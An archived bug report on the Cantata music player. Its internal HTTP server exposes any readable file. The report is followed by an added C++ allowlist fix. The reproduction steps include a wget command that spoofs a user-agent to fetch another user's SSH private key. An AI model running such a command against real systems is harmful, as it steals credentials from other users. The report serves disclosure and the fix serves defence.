This repository was archived by the owner on Mar 3, 2022. It is now read-only.
This is such an obvious mistake (or a not-well-hidden backdoor?), I did not expect it to
exist here.
By default cantata listens on the external network interface and lets anyone
download any readable file. It is not possible to disable the internal HTTP server;
the most "secure" thing to do is to let it listen only on the "lo" interface. The internal
HTTP server should be removed; this is not something that an audio player should
have. And users sure do not expect such "features".
What steps will reproduce the problem?
1. Start cantata as user "me" and play some file using internal http server.
2. Run as user "not-me":
netstat -tuna|grep LISTEN
3. Now we know the port and IP. Run as user "not-me":
wget --user-agent='Music Player Daemon 0.17.4' "http://127.0.0.1:37420/home/me/.ssh/id_rsa?cantata=song" -O id_rsa
4. Do something fun with passwords, keys or any other data.
What version of the product are you using? On what operating system?
1.2.1, Gentoo Linux amd64
Original issue reported on code.google.com by Nickollai on 24 Dec 2013 at 5:19
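One way to close the hole reported above, as an added example that is not Cantata's code or its eventual fix: the built-in server answers only for files the player itself queued, compared by canonical path, so a request for an arbitrary readable file is refused even from 127.0.0.1 as in the reproduction. `ServeGate`, `offer`, `allows`, `demoAllows` and the sample paths are hypothetical names and constructed values.

```cpp
#include <filesystem>
#include <iostream>
#include <set>
#include <string>
#include <system_error>

namespace fs = std::filesystem;

// Hypothetical gate for a player's built-in HTTP server: a request is served
// only if it names a file the player itself queued, whatever path is asked for.
class ServeGate {
public:
    // Called when the player hands a local file to the daemon for playback.
    void offer(const std::string& file) {
        const std::string c = canon(file);
        if (!c.empty()) offered_.insert(c);
    }

    // Decide on a request target such as "/music/a.flac?cantata=song".
    // Assumption: the HTTP layer has already percent-decoded the target.
    bool allows(const std::string& target) const {
        const std::string path = target.substr(0, target.find('?'));
        if (path.empty() || path.front() != '/') return false;
        const std::string c = canon(path);
        return !c.empty() && offered_.count(c) > 0;
    }

private:
    // Collapse ".", ".." and symlinks in the existing part of the path so both
    // sides are compared in one canonical spelling; empty string on error.
    static std::string canon(const std::string& p) {
        std::error_code ec;
        const fs::path c = fs::weakly_canonical(fs::path(p), ec);
        return ec ? std::string() : c.string();
    }
    std::set<std::string> offered_;
};

// Constructed sample: exactly one queued file (made-up path).
bool demoAllows(const std::string& target) {
    ServeGate gate;
    gate.offer("/nonexistent-demo/music/a.flac");
    return gate.allows(target);
}

int main() {
    std::cout << demoAllows("/nonexistent-demo/music/a.flac?cantata=song")
              << demoAllows("/home/me/.ssh/id_rsa?cantata=song") << '\n';
}
```

The allowlist stops requests for files that were never queued; a file that is queued remains readable by any client that can reach the port.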